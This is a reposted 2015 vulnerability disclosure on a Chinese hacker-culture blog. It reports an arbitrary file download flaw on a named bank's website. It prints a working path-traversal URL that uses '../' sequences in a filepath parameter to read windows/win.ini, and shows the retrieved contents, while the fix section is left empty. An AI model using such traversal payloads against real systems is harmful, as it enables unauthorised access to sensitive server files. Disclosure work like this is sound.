记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

重庆三峡银行某站存在任意文件下载漏洞

2015-03-08 13:35

重庆三峡银行主站存在任意文件下载漏洞,可下载一些敏感信息。

code 区域
http://www.ccqtgb.com/download/download.jsp?filename=windows/win.ini&filepath=../../../../../../../../../../../windows/win.ini



下载windows/win.ini



; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

漏洞证明:

code 区域
http://www.ccqtgb.com/download/download.jsp?filename=windows/win.ini&filepath=../../../../../../../../../../../windows/win.ini



下载windows/win.ini



; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

修复方案:

修复方案你们懂的。


知识来源: www.wooyun.org/bugs/wooyun-2015-093317

阅读:118112 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“重庆三峡银行某站存在任意文件下载漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云